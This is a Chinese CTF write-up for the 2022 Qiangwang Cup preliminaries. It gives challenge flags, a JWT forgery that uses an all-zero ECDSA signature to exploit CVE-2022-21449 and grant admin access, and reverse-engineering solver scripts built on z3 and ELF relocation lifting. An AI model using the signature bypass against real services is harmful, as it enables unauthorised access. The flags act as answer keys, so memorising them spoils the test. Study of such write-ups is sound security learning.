-
[ CTF ]【天格】战队WriteUp-第六届“强网杯”全国安全挑战赛(初赛)【持续更新中】
WriteUp推荐
文章开始前,我还是想向大家推荐一下其他战队的师傅写的WriteUp。
在本人允许的时间后发布这篇文章以后,也有不少师傅相继发出了WriteUp,拜读了各位师傅的WriteUp后学习到的东西也是非常多的。接下来就向大家先推荐一下三个战队的师傅们的解题思路和方法技巧1、Nu1L战队WriteUp
2、W&M
3、Arr3stY0u战队WriteUp
【Misc】签到
flag{we1come_t0_qwb_s6}【Misc】问卷调查
flag{W31c0me_70_QWB2022_Se3_You_N3x7_time}【Crypto】myJWT
1、根据分析,由于验证时过滤的不严格,从而导致了sig值对(r, s)为(0, 0)时可以绕过验证
2、kali直连,输入名字得到token
3、尝试“getflag”发现提示You are not the administrator.
4、分析token,发现token可以分为三段,中间有“.”隔开
第一段:
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=- 1
第二段:
eyJpc3MiOiJxd2IiLCJuYW1lIjoiVEciLCJhZG1pbiI6ZmFsc2UsImV4cCI6MTY1OTI2NDIyNzI5NX0=- 1
第三段:
QpUmMgSM9QhuycHw1ImSEoWkroSstwcCltlFwz0cDHcYxxvRO_VKg3UrUjhcNr81sgDNIyB-uwVCVbS3xbw3o7Zc3Wx8CQAlK4XgyVHWIMh8YZdC4KOg3RWjWWofb4uH- 1
5、分辨进行base64解码
6、第二段解码发现有admin:false,根究一开始“You are not the administrator”的提示把“false”改成“true”,再进行base64加密。
7、由1知则第三段用“0”填充,第三段的长度是128,用128个0进行base64
8、三者组合以后进行提交
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=. eyJpc3MiOiJxd2IiLCJuYW1lIjoiVEciLCJhZG1pbiI6dHJ1ZSwiZXhwIjoxNjU5MjY0MjI3Mjk1fQ==.MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA=- 1
9、提交时发现“time out!”
这题还有时间限制就要加快速度了10、重新获取发现第一段内容没变,第二段变了
11、提交后发现还是提示“You are not the administrator”
12、经过尝试后发现是第三段的“0”经过base64后保留“A”,提交后获取到flag
flag{cve-2022-21449_Secur1ty_0f_c0de_1mplementation}【Reverse】GameMaster
1、用Reflector反编译C#,在goldfun函数里面发现
2、异或后进行AES解密
3、导出文件为exe后继续反编译
private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream) { int index = -1; for (int i = 0; i < 320; i++) { x = (((((x >> 0x1d) ^ (x >> 0x1c)) ^ (x >> 0x19)) ^ (x >> 0x17)) & ((ulong) 1L)) | (x << 1); y = (((y >> 30) ^ (y >> 0x1b)) & ((ulong) 1L)) | (y << 1); z = (((((((z >> 0x1f) ^ (z >> 30)) ^ (z >> 0x1d)) ^ (z >> 0x1c)) ^ (z >> 0x1a)) ^ (z >> 0x18)) & ((ulong) 1L)) | (z << 1); if ((i % 8) == 0) { index++; } KeyStream[index] = (byte) ((KeyStream[index] << 1) | ((uint) ((((z >> 0x20) & ((ulong) 1L)) & ((x >> 30) & ((ulong) 1L))) ^ ((((z >> 0x20) & ((ulong) 1L)) ^ ((ulong) 1L)) & ((y >> 0x1f) & ((ulong) 1L)))))); } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
4、利用keystream构造l,再用l复现真正的key异或解密bytes
if (((s != null) && (environmentVariable != null)) && (str3 != null)) { ulong num = ulong.Parse(s); ulong num2 = ulong.Parse(environmentVariable); ulong num3 = ulong.Parse(str3); ulong[] l = new ulong[3]; byte[] keyStream = new byte[40]; byte[] buffer2 = new byte[40]; byte[] key = new byte[12]; byte[] first = new byte[] { 0x65, 5, 80, 0xd5, 0xa3, 0x1a, 0x3b, 0x26, 0x13, 6, 0xad, 0xbd, 0xc6, 0xa6, 140, 0xb7, 0x2a, 0xf7, 0xdf, 0x18, 0x6a, 20, 0x91, 0x25, 0x18, 7, 0x16, 0xbf, 110, 0xb3, 0xe3, 5, 0x3e, 9, 13, 0x11, 0x41, 0x16, 0x25, 5 }; byte[] bytes = new byte[] { 60, 100, 0x24, 0x56, 0x33, 0xfb, 0xa7, 0x6c, 0x74, 0xf5, 0xcf, 0xdf, 40, 0x67, 0x22, 0x3e, 0x16, 0xfb, 0xe3 }; l[0] = num; l[1] = num2; l[2] = num3; Check1(l[0], l[1], l[2], keyStream); if (first.SequenceEqual<byte>(keyStream)) { ParseKey(l, key); for (int i = 0; i < bytes.Length; i++) { bytes[i] = (byte) (bytes[i] ^ key[i % key.Length]); } MessageBox.Show("flag{" + Encoding.Default.GetString(bytes) + "}", "Congratulations!", MessageBoxButtons.OK); } } }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
5、最后
from Crypto.Util.number import * first = [0x65, 5, 80, 0xd5, 0xa3, 0x1a, 0x3b, 0x26, 0x13, 6, 0xad, 0xbd, 0xc6, 0xa6, 140, 0xb7, 0x2a, 0xf7, 0xdf, 0x18, 0x6a, 20, 0x91, 0x25, 0x18, 7, 0x16, 0xbf, 110, 0xb3, 0xe3, 5, 0x3e, 9, 13, 0x11, 0x41, 0x16, 0x25, 5] bytes =[60, 100, 0x24, 0x56, 0x33, 0xfb, 0xa7, 0x6c, 0x74, 0xf5, 0xcf, 0xdf, 40, 0x67, 0x22, 0x3e, 0x16, 0xfb, 0xe3] """ private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream) { int index = -1; for (int i = 0; i < 320; i++) { x = (((((x >> 0x1d) ^ (x >> 0x1c)) ^ (x >> 0x19)) ^ (x >> 0x17)) & ((ulong) 1L)) | (x << 1); y = (((y >> 30) ^ (y >> 0x1b)) & ((ulong) 1L)) | (y << 1); z = (((((((z >> 0x1f) ^ (z >> 30)) ^ (z >> 0x1d)) ^ (z >> 0x1c)) ^ (z >> 0x1a)) ^ (z >> 0x18)) & ((ulong) 1L)) | (z << 1); if ((i % 8) == 0) { index++; } KeyStream[index] = (byte) ((KeyStream[index] << 1) | ((uint) ((((z >> 0x20) & ((ulong) 1L)) & ((x >> 30) & ((ulong) 1L))) ^ ((((z >> 0x20) & ((ulong) 1L)) ^ ((ulong) 1L)) & ((y >> 0x1f) & ((ulong) 1L)))))); } } """ from z3 import * so = Solver() #KeyStream = [BitVec(f'KeyStream{i}',8) for i in range(40)] KeyStream = [0] * 40 l = [BitVec(f'l{i}',64) for i in range(3)] #x, y, z = BitVecs("x y z", 64) x, y, z = l index = -1 for i in range(320): x = (((((x >> 0x1d) ^ (x >> 0x1c)) ^ (x >> 0x19)) ^ (x >> 0x17)) & 1) | (x << 1) y = (((y >> 30) ^ (y >> 0x1b)) & 1) | (y << 1) z = (((((((z >> 0x1f) ^ (z >> 30)) ^ (z >> 0x1d)) ^ (z >> 0x1c)) ^ (z >> 0x1a)) ^ (z >> 0x18)) & 1) | ( z << 1) if i % 8 == 0: index+=1 KeyStream[index] = ((KeyStream[index] << 1) | ( ((z >> 0x20) & 1) & ((x >> 30) & 1) ^ (((z >> 0x20) & 1) ^ 1) & ((y >> 0x1f) & 1))) for i in range(40): so.add(KeyStream[i] == first[i]) if so.check() == sat: m = so.model() print(m) L = [] for i in l: L.append(m[i].as_long()) else: print('Error') """ private static void ParseKey(ulong[] L, byte[] Key) { for (int i = 0; i < 3; i++) { for (int j = 0; j < 4; j++) { Key[(i * 4) + j] = (byte) ((L[i] >> (j * 8)) & ((ulong) 0xffL)); } } } """ Key = [0] * 12 for i in range(3): for j in range(4): Key[(i * 4) + j] = ((L[i] >> (j * 8)) & 0xff) print(Key) for i in range(len(bytes)): print(chr(bytes[i] ^ Key[i%len(Key)]),end='')- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
flag{Y0u_@re_G3meM3s7er!}【Reverse】deeprev
1、参考文章
GoogleCTF2022 - eldar writeups
2、分析
import lief from collections import namedtuple from dataclasses import dataclass from typing import Any from capstone import * from z3 import * import numpy as np md = Cs(CS_ARCH_X86, CS_MODE_64) b = None try: b = lief.ELF.parse(r"deeprev") except: raise Exception('Must have the ./eldar binary in cwd') rela = [x for x in b.sections if x.name == '.rela.dyn'][0] dynsym = [x for x in b.sections if x.name == '.dynsym'][0] @dataclass class Symbol(object): idx: int def __repr__(self): return f's{self.idx}' @dataclass class Reloc(object): idx: int def __repr__(self): return f'r{self.idx}' @dataclass class Ref(object): val: Any def __repr__(self): return f'&{self.val}' @dataclass class SymAddr(object): sym: Symbol field: str def __repr__(self): return f'{self.sym}.{self.field}' @dataclass class RelocAddr(object): reloc: Reloc field: str def __repr__(self): return f'{self.reloc}.{self.field}' def vaddr(self): off = 0 match self.field: case 'r_address': off = 0 case 'r_info': off = 8 case 'r_addend': off = 16 return (self.reloc.idx * 24) + off + rela.virtual_address @dataclass class FlagAddr(object): idx: int def __repr__(self): return f'flag[{self.idx}]' @dataclass class OutAddr(object): idx: int def __repr__(self): return f'out[{self.idx}]' @dataclass class ArrAddr(object): idx: int def __repr__(self): return f'arr[{self.idx}]' BaseAddr = namedtuple('baseaddr', []) FailAddr = namedtuple('fail', []) def format_addr(addr: int): if addr >= rela.virtual_address and addr < rela.virtual_address + rela.size: offset = addr - rela.virtual_address r_offset = (offset // 24) r_rem = offset % 24 if r_offset >= 3 and r_offset <= 0x61: arr_idx = (r_offset - 3) * 3 + (r_rem // 8) return ArrAddr(arr_idx) elif r_offset == 89: return OutAddr(r_rem) match r_rem: case 0: return RelocAddr(Reloc(r_offset), 'r_address') case 8: return RelocAddr(Reloc(r_offset), 'r_info') case 16: return RelocAddr(Reloc(r_offset), 'r_addend') case _: return RelocAddr(Reloc(r_offset), r_rem) elif addr > dynsym.virtual_address and addr < dynsym.virtual_address + dynsym.size: offset = addr - dynsym.virtual_address print(hex(addr)) r_offset = (offset // 24) r_rem = offset % 24 match r_rem: case 0: return SymAddr(Symbol(r_offset), 'st_name') case 8: return Symbol(r_offset) case 16: return SymAddr(Symbol(r_offset), 'st_size') case _: return SymAddr(Symbol(r_offset), r_rem) elif addr >= 0x404040 and addr < 0x404040 + 0x21: off = addr - 0x404040 return FlagAddr(off) elif addr == 0x804000: return BaseAddr() elif addr == 0x40201D: return FailAddr() else: return addr def to_sym(name): assert len(name) == 1 return Symbol(ord(name[0])) Rel = namedtuple('REL', ['dst', 'val', 'ridx']) Copy = namedtuple('CPY', ['dst', 'symbol', 'ridx']) R64 = namedtuple('R64', ['dst', 'symbol', 'addend', 'ridx']) R32 = namedtuple('R32', ['dst', 'symbol', 'addend', 'ridx']) def parse(b) -> list: print('[*] Loading relocations...') relocs = list(b.relocations) relocs = relocs[:1267] print('[*] Parsing...') instructions = [] for i in range(3, len(relocs)): r = relocs[i] match r.type: case 1: # R64 instructions.append(R64(format_addr(r.address), to_sym(r.symbol.name), format_addr(r.addend), i)) case 5: # CPY instructions.append(Copy(format_addr(r.address), to_sym(r.symbol.name), i)) case 8: # REL instructions.append(Rel(format_addr(r.address), format_addr(r.addend), i)) case 10: # R32 instructions.append(R32(format_addr(r.address), to_sym(r.symbol.name), format_addr(r.addend), i)) return instructions Mov = namedtuple('mov', ['dst', 'src', 'sz', 'ridx']) Add = namedtuple('add', ['dst', 'src', 'addend', 'ridx']) def lift_mov_add(instructions): idx = 0 sizes = [] curr = [8] * 8 sizes.append(curr) for instr in instructions: c = list(curr) match instr: case Rel(SymAddr(Symbol(idx), 'st_size'), val, ridx): c[idx] = val sizes.append(c) while idx < len(instructions): match instructions[idx]: case Rel(dst, val, ridx): instructions[idx] = Mov(dst, Ref(val), 8, ridx) case Copy(dst, sym, ridx): instructions[idx] = Mov(dst, sym, sizes[idx][sym.idx], ridx) case R64(dst, sym, add, ridx): instructions[idx] = Add(dst, sym, add, ridx) idx += 1 return instructions def remove_sizes(instructions): # Sizes are now nops idx = 0 while idx < len(instructions): match instructions[idx]: case Mov(SymAddr(Symbol(s), 'st_size'), _, _, _) if s != 3: instructions[idx:idx + 1] = [] idx += 1 return instructions def lift_indirect(instructions): # [0349] :: mov r350.r_addend, s2 # [0350] :: add s4, s4, 0 # [0351] :: mov r350.r_addend, &0 idx = 0 while idx < len(instructions): match instructions[idx:idx + 3]: case [ Mov(RelocAddr(Reloc(rel_1), 'r_addend'), Symbol(sidx_1), sz_1, ridx_1), Add(dst_2, sym_2, _, ridx_2), Mov(RelocAddr(Reloc(rel_3), 'r_addend'), Ref(0), sz_3, _), ] if ( (rel_1 == ridx_2) and (rel_3 == ridx_2) ): instructions[idx:idx + 3] = [ Add(dst_2, sym_2, Symbol(sidx_1), ridx_1) ] idx += 1 return instructions Block = namedtuple('block', ['arr', 'flag', 'ridx']) Output = namedtuple('output', ['out', 'arr', 'ridx']) def lift_block(instructions): # [0378] :: mov s2, &arr[1] # [0008] :: add s4, s4, s2 # [0382] :: mov s2, &flag[1] # [0384] :: movb s7, s2 # [0385] :: mov s2, &s7 # [0008] :: add s4, s4, s2 # [0390] :: r32 s4.st_value_p1, s1, 0 # [0391] :: mov s2, &arr[1] # [0392] :: mov s6, s2 # [0393] :: mov s2, &s4 # [0008] :: add s5, s4, s2 # [0397] :: mov s2, &s5 # [0008] :: add s5, s5, s2 # [0008] :: add s5, s5, s2 # [0404] :: add s5, s5, arr[0] # [0405] :: mov arr[1], s5 # [0406] :: mov r407.r_address, s2 # [0407] :: add 0, s6, 0 idx = 0 while idx < len(instructions): match instructions[idx:idx + 18]: case [ Mov(_, arr, _, ridx), Add(_, _, _, _), Mov(_, flag, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), R32(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), ]: instructions[idx:idx + 18] = [ Block(arr, flag, ridx) ] idx += 1 return instructions Reset = namedtuple('reset', ['ridx']) ShuffleBlock = namedtuple('shuffleblock', ['f1', 'f2', 'ridx']) def lift_reset(instructions): idx = 0 while idx < len(instructions) - 256: good = True for i in range(256): op = instructions[idx + i] if type(op) == Mov: dst, src, _, _ = op if dst != ArrAddr(i) or src != Ref(i): good = False break else: good = False break if good: instructions[idx:idx + 256] = [Reset(instructions[idx].ridx)] idx += 1 return instructions def lift_shuffle_block(instructions): idx = 0 while idx < len(instructions) - 256: good = True for i in range(256): op = instructions[idx + i] if type(op) == Block: arr, flag, ridx = op if arr != Ref(ArrAddr(i)): good = False break else: good = False break if good: instructions[idx:idx + 256] = [ShuffleBlock(instructions[idx].flag, instructions[idx + 1].flag, instructions[idx].ridx)] idx += 1 return instructions Output = namedtuple('output', ['out', 'arr', 'ridx']) def lift_output(instructions): idx = 0 while idx < len(instructions): match instructions[idx:idx + 26]: case [ Mov(_, arr, _, ridx), Add(_, _, _, _), R32(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), R32(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Mov(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Add(_, _, _, _), Mov(out, _, _, _), ]: instructions[idx:idx + 26] = [Output(out, arr, ridx)] idx += 1 return instructions MultAdd = namedtuple('multadd', ['out', 'val', 'k', 'ridx']) def lift_multadd(instructions): idx = 0 while idx < len(instructions): match instructions[idx:idx + 3]: # block prefix case [ Mov(Symbol(2), out, _, ridx), Mov(Symbol(5), Symbol(2), _, _), Mov(Symbol(6), Ref(0), _, _), ]: k = 0 double = False ptr = idx + 3 good = True while ptr < len(instructions): match instructions[ptr]: case Mov(Symbol(2), Ref(Symbol(6)), _, _): double = True case Mov(Symbol(2), Ref(Symbol(5)), _, _): double = False case Add(Symbol(6), Symbol(6), Symbol(2), _): k = (k * 2) if double else (k + 1) case Add(Symbol(7), Symbol(7), Symbol(2), _): ptr += 1 break case _: good = False break ptr += 1 if good: instructions[idx:ptr] = [ MultAdd(Symbol(7), out, k, ridx) ] idx += 1 return instructions Trunc = namedtuple('trunc', ['val', 'k', 'ridx']) def lift_truncate(instructions): idx = 0 while idx < len(instructions): match instructions[idx:idx + 2]: case [ Mov(Symbol(2), Ref(SymAddr(Symbol(5), 11)), _, ridx), Mov(SymAddr(Symbol(7), 11), Symbol(2), 5, _) ]: instructions[idx:idx + 2] = [ Trunc(Symbol(7), 0xffffff, ridx)] idx += 1 return instructions ArraySlots = namedtuple('arr', ['values', 'ridx']) def lift_array_slots(instructions): idx = 0 while idx < len(instructions): match instructions[idx]: case Mov(BaseAddr(), Ref(0), _, ridx): ptr = idx + 1 while ptr < len(instructions): op = instructions[ptr] if type(op) != Mov or op.dst != BaseAddr(): break ptr += 1 start = idx end = ptr data = [] # Check for movs into array. vstart = RelocAddr(Reloc(ridx), 'r_address').vaddr() offset = 0 while end + offset < len(instructions) and offset < ((end - start) * 3): op = instructions[end + offset] if type(op) == Mov and type(op.dst) is RelocAddr and op.dst.vaddr() == vstart + (offset * 8): data.append(op.src.val) else: break offset += 1 if len(data) > 0: data += [0] * (((end - start) * 3) - len(data)) instructions[idx:end + offset] = [ ArraySlots(data, ridx) ] idx += 1 return instructions Shellcode = namedtuple('shellcode', ['dst', 'code', 'ridx']) def lift_shellcode(instructions): idx = 0 while idx < len(instructions): match instructions[idx:idx + 6]: case [ ArraySlots(values, ridx), Mov(Symbol(3), Ref(RelocAddr(Reloc(rel2), 'r_address')), _, _), Mov(SymAddr(Symbol(3), 'st_name'), _, _, _), Add(dst, Symbol(3), _, _), Mov(Symbol(2), _, _, _), Mov(RelocAddr(Reloc(rel6), 'r_address'), Symbol(2), _, _) ] if (rel2 == ridx) and (rel6 == ridx): instructions[idx:idx + 6] = [ Shellcode(dst, b''.join([(x & 0xffffffffffffffff).to_bytes(8, 'little') for x in values]), ridx) ] idx += 1 return instructions Aop = namedtuple('aop', ['dst', 'op', 'val', 'k', 'ridx']) def lift_aop(instructions): idx = 0 while idx < len(instructions): match instructions[idx:idx + 5]: case [ Mov(Symbol(2), val, _, ridx), Mov(Symbol(5), Symbol(2), _, _), Shellcode(_, data, _), Mov(Symbol(2), Ref(Symbol(5)), _, _), Add(dst, dst2, Symbol(2), _) ] if len(data) == 24 and (dst == dst2): op = next(md.disasm(data, 0)) t = op.mnemonic k = int(op.op_str.split(', ')[-1], 16) instructions[idx:idx + 5] = [ Aop(dst, t, val, k, ridx) ] idx += 1 return instructions def solve_end_flag(instructions): orig = [BitVec('f%d' % i, 8) for i in range(16, 28)] flag = ([0] * 16) + [ZeroExt(24, x) for x in orig] s = Solver() for o in orig: s.add(UGT(o, 0x20)) s.add(ULT(o, 0x7f)) idx = 0 while idx < len(instructions): match instructions[idx]: case Mov(Symbol(7), Ref(v), _, ridx) if type(v) is int: x = BitVecVal(v, 32) ptr = idx + 1 while ptr < len(instructions): match instructions[ptr]: case MultAdd(Symbol(7), Ref(FlagAddr(f)), k, _): x += (flag[f] * k) case Aop(Symbol(7), op, Ref(FlagAddr(f)), k, _): v = None match op: case 'and': v = flag[f] & k case 'xor': v = flag[f] ^ k case 'or': v = flag[f] | k case 'rol': v = ZeroExt(24, RotateLeft(Extract(7, 0, flag[f]), k)) case 'ror': v = ZeroExt(24, RotateRight(Extract(7, 0, flag[f]), k)) case 'shl': v = ZeroExt(24, Extract(7, 0, flag[f]) << k) case 'shr': v = flag[f] >> k case _: raise Exception(f'unknown aop: {op}') x += v case Trunc(Symbol(7), k, _): s.add(x == 0) case _: break ptr += 1 idx += 1 print('solving...') print(s.check()) m = s.model() flag = bytes([m.eval(o).as_long() for o in orig]) return flag def solve_out_arr(instructions): X = [] Y = [] idx = 0 while idx < len(instructions): match instructions[idx]: case Mov(Symbol(7), Ref(v), _, ridx) if type(v) is int: row = [] ptr = idx + 1 while ptr < len(instructions): match instructions[ptr]: case MultAdd(Symbol(7), Ref(OutAddr(_)), k, _): row.append(k) case Trunc(Symbol(7), k, _): X.append(row) Y.append(-v) case _: break ptr += 1 idx += 1 a = np.array(X, dtype=np.uint32) b = np.array(Y, dtype=np.uint32) return [int(x) for x in np.linalg.solve(a, b)] def solve_start_flag(output): def sim(a, b): arr = list(range(256)) z = 0 for i in range(256): p = a if i % 2 == 0 else b z = (z + arr[i] + p) & 0xff arr[i], arr[z] = arr[z], arr[i] out = [0, 0, 0] z = 0 for i in range(3): z = (z + arr[i]) & 0xff arr[i], arr[z] = arr[z], arr[i] out[i] = arr[(arr[i] + arr[z]) & 0xff] return out def solve_chunk(k1, k2, k3): # Brute force chunk. for a in range(0x20, 0x7f): for b in range(0x20, 0x7f): out = sim(a, b) if abs(out[0] - k1) <= 1 and abs(out[1] - k2) <= 1 and abs(out[2] - k3) <= 1: return (a, b) return None f = [] for i in range(0, len(output), 3): f += list(solve_chunk(*output[i:i + 3])) return bytes(f) def dump(instructions): for op in instructions: match op: case Mov(SymAddr(sym, 'st_name'), Ref(val), 8, ridx) if type(val) is int: name = val & 0xffffffff info = (val >> 4) & 0xff other = (val >> 5) & 0xff shndx = (val >> 6) & 0xffff print(f'[{ridx:04d}] :: setinfo {sym}, name=0x{name:x}, info=0x{info:x}, other=0x{other:x}, shndx=0x{shndx:x}') case Mov(BaseAddr(), Ref(0), _, ridx): print(f'[{ridx:04d}] :: [ARRAY SLOT]') case Mov(dst, src, 8, ridx): print(f'[{ridx:04d}] :: mov {dst}, {src}') case Mov(dst, src, sz, ridx): print(f'[{ridx:04d}] :: mov({sz}) {dst}, {src}') case Add(dst, src, add, ridx): print(f'[{ridx:04d}] :: add {dst}, {src}, {add}') case R32(dst, src, add, ridx): print(f'[{ridx:04d}] :: r32 {dst}, {src}, {add}') case Block(arr, flag, ridx): print(f'[{ridx:04d}] :: shuffle {arr}, {flag}') case Output(out, arr, ridx): print(f'[{ridx:04d}] :: output {out}, {arr}') case ShuffleBlock(f1, f2, ridx): print(f'[{ridx:04d}] :: shuffleblock {f1}, {f2}') case MultAdd(dst, val, k, ridx): print(f'[{ridx:04d}] :: madd {dst} += ({val} * {k})') case Aop(dst, op, val, k, ridx): print(f'[{ridx:04d}] :: aop {dst} += ({val} {op} {k})') case Reset(ridx): print(f'[{ridx:04d}] :: reset') case Trunc(val, k, ridx): print(f'[{ridx:04d}] :: trunc {val} &= 0x{k:x}') case ArraySlots(values, ridx): print(f'[{ridx:04d}] :: array [{", ".join([hex(x) for x in values])}]') case Shellcode(dst, code, ridx): print(f'[{ridx:04d}] :: exec {dst} <- {code.hex()}') print('-' * 20) for i in md.disasm(code, 0): if i.mnemonic == 'ret': break print(" 0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str.replace('0x8040e4', 's5').replace('0x8040cc', 's4'))) print('-' * 20) case _: print(op) LIFTS = [ lift_mov_add, remove_sizes, lift_indirect, lift_block, lift_reset, lift_shuffle_block, lift_output, lift_multadd, lift_truncate, lift_array_slots, lift_shellcode, lift_aop, ] def lift(instructions): for lift_fn in LIFTS: print(f'[*] {lift_fn.__name__}...') instructions = lift_fn(instructions) return instructions instructions = parse(b) instructions = lift(instructions) dump(instructions)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
- 184
- 185
- 186
- 187
- 188
- 189
- 190
- 191
- 192
- 193
- 194
- 195
- 196
- 197
- 198
- 199
- 200
- 201
- 202
- 203
- 204
- 205
- 206
- 207
- 208
- 209
- 210
- 211
- 212
- 213
- 214
- 215
- 216
- 217
- 218
- 219
- 220
- 221
- 222
- 223
- 224
- 225
- 226
- 227
- 228
- 229
- 230
- 231
- 232
- 233
- 234
- 235
- 236
- 237
- 238
- 239
- 240
- 241
- 242
- 243
- 244
- 245
- 246
- 247
- 248
- 249
- 250
- 251
- 252
- 253
- 254
- 255
- 256
- 257
- 258
- 259
- 260
- 261
- 262
- 263
- 264
- 265
- 266
- 267
- 268
- 269
- 270
- 271
- 272
- 273
- 274
- 275
- 276
- 277
- 278
- 279
- 280
- 281
- 282
- 283
- 284
- 285
- 286
- 287
- 288
- 289
- 290
- 291
- 292
- 293
- 294
- 295
- 296
- 297
- 298
- 299
- 300
- 301
- 302
- 303
- 304
- 305
- 306
- 307
- 308
- 309
- 310
- 311
- 312
- 313
- 314
- 315
- 316
- 317
- 318
- 319
- 320
- 321
- 322
- 323
- 324
- 325
- 326
- 327
- 328
- 329
- 330
- 331
- 332
- 333
- 334
- 335
- 336
- 337
- 338
- 339
- 340
- 341
- 342
- 343
- 344
- 345
- 346
- 347
- 348
- 349
- 350
- 351
- 352
- 353
- 354
- 355
- 356
- 357
- 358
- 359
- 360
- 361
- 362
- 363
- 364
- 365
- 366
- 367
- 368
- 369
- 370
- 371
- 372
- 373
- 374
- 375
- 376
- 377
- 378
- 379
- 380
- 381
- 382
- 383
- 384
- 385
- 386
- 387
- 388
- 389
- 390
- 391
- 392
- 393
- 394
- 395
- 396
- 397
- 398
- 399
- 400
- 401
- 402
- 403
- 404
- 405
- 406
- 407
- 408
- 409
- 410
- 411
- 412
- 413
- 414
- 415
- 416
- 417
- 418
- 419
- 420
- 421
- 422
- 423
- 424
- 425
- 426
- 427
- 428
- 429
- 430
- 431
- 432
- 433
- 434
- 435
- 436
- 437
- 438
- 439
- 440
- 441
- 442
- 443
- 444
- 445
- 446
- 447
- 448
- 449
- 450
- 451
- 452
- 453
- 454
- 455
- 456
- 457
- 458
- 459
- 460
- 461
- 462
- 463
- 464
- 465
- 466
- 467
- 468
- 469
- 470
- 471
- 472
- 473
- 474
- 475
- 476
- 477
- 478
- 479
- 480
- 481
- 482
- 483
- 484
- 485
- 486
- 487
- 488
- 489
- 490
- 491
- 492
- 493
- 494
- 495
- 496
- 497
- 498
- 499
- 500
- 501
- 502
- 503
- 504
- 505
- 506
- 507
- 508
- 509
- 510
- 511
- 512
- 513
- 514
- 515
- 516
- 517
- 518
- 519
- 520
- 521
- 522
- 523
- 524
- 525
- 526
- 527
- 528
- 529
- 530
- 531
- 532
- 533
- 534
- 535
- 536
- 537
- 538
- 539
- 540
- 541
- 542
- 543
- 544
- 545
- 546
- 547
- 548
- 549
- 550
- 551
- 552
- 553
- 554
- 555
- 556
- 557
- 558
- 559
- 560
- 561
- 562
- 563
- 564
- 565
- 566
- 567
- 568
- 569
- 570
- 571
- 572
- 573
- 574
- 575
- 576
- 577
- 578
- 579
- 580
- 581
- 582
- 583
- 584
- 585
- 586
- 587
- 588
- 589
- 590
- 591
- 592
- 593
- 594
- 595
- 596
- 597
- 598
- 599
- 600
- 601
- 602
- 603
- 604
- 605
- 606
- 607
- 608
- 609
- 610
- 611
- 612
- 613
- 614
- 615
- 616
- 617
- 618
- 619
- 620
- 621
- 622
- 623
- 624
- 625
- 626
- 627
- 628
- 629
- 630
- 631
- 632
- 633
- 634
- 635
- 636
- 637
- 638
- 639
- 640
- 641
- 642
- 643
- 644
- 645
- 646
- 647
- 648
- 649
- 650
- 651
- 652
- 653
- 654
- 655
- 656
- 657
- 658
- 659
- 660
- 661
- 662
- 663
- 664
- 665
- 666
- 667
- 668
- 669
- 670
- 671
- 672
- 673
- 674
- 675
- 676
- 677
- 678
- 679
- 680
- 681
- 682
- 683
- 684
- 685
- 686
- 687
- 688
